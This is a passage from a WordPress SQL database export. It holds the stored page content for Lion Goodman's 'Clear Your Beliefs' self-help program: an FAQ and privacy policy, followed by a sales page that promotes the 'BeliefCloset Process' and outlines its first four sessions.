href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" >ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank" >BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" >ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<p> </p>', 'Clear Your Beliefs Program', '', 'inherit', 'open', 'open', '', '1941-revision-v1', '', '', '2015-05-12 13:19:52', '2015-05-12 18:19:52', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2174, 2, '2015-05-12 13:21:16', '2015-05-12 18:21:16', '&nbsp;\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<p>&nbsp;</p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p>&nbsp;</p>\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.</p>\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<p>&nbsp;</p>\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!Take me to the program description,tell me about all the cool bonuses I''ll get,and how much it costs...</a></h1>\n<p>&nbsp;</p>\n<h1>Why Does This Happen?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p>\n<p>Neuroscientists call the brain''s ability to change over time "neuroplasticity."</p>\n<p>It can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n<p>&nbsp;</p>\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></p>\n<p>If you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<p>&nbsp;</p>\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a>Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p><strong>We literally create our reality with our beliefs.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.</p>\n<p>&nbsp;</p>\n<h1>Upgrade Your Human Operating System</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong></p>\n\n<strong><em>I''m not enough.</em></strong>\n<strong><em>I can''t do it.</em></strong>\n<strong><em>I''m not worthy.</em></strong>\n<strong><strong><em>I''ll never be like them.</em></strong></strong>\n<strong><em>I''m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There''s something wrong with me.</em></strong>\n<strong><em>I''m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.</p>\n<p><strong>Here''s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<p>&nbsp;</p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p>The same thing is true in your subconscious mind:</p>\n<p><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></p>\n<p><strong>It''s that simple.</strong></p>\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\n<p>When you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It''s that simple.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Beliefs Are Difficult To Change</h1>\n\n<p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n<p>&nbsp;</p>\n<h1>Why We React The Way We Do</h1>\n\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n\n<p>\n</p>\nWhy did I say that?\nWhat''s wrong with me?\nWhy didn''t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<p><em></p>\n\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p>\n\n<p><strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p>\n\n<p>&nbsp;</p>\n<h1>Here''s Some Good News</h1>\n\n<strong><strong><strong>First: It''s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n<h1>Imagine The Life You Desire</h1>\n\n<p><strong>Can you imagine this?</strong></p>\n<p><img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" /></p>\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n<p>&nbsp;</p>\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n<p>&nbsp;</p>\n<h1>Clear Whatever Is In The Way</h1>\n\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Is This A Guaranteed Cure-All?</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n<p>&nbsp;</p>\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n<p>&nbsp;</p>\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\n\n<p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\n\n<p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\n\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p>\n\n<p>&nbsp;</p>\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n<p>In gratitude, and with warm wishes for your total success,</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a></p>\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n<p>&nbsp;</p>\n<h1>Register Today and Discover What''s Possible</h1>\n\n<p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p>\n\n<p>&nbsp;</p>\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n<p><strong> In Session 1, you will:</strong></p>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n<p><strong> In Session 2, you will:</strong></p>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.</p>\n<p>This isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.</p>\n<p><em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...</p>\n\n<p>Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.</p>\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!\n\n<p><strong> In Session 3, you will:</strong></p>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.</p>\n<p>If you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?</p>\n<p>Humans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.</p>\n\n<p>&nbsp;</p>\n\n<p><strong> In Session 4, you will:</strong></p>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" 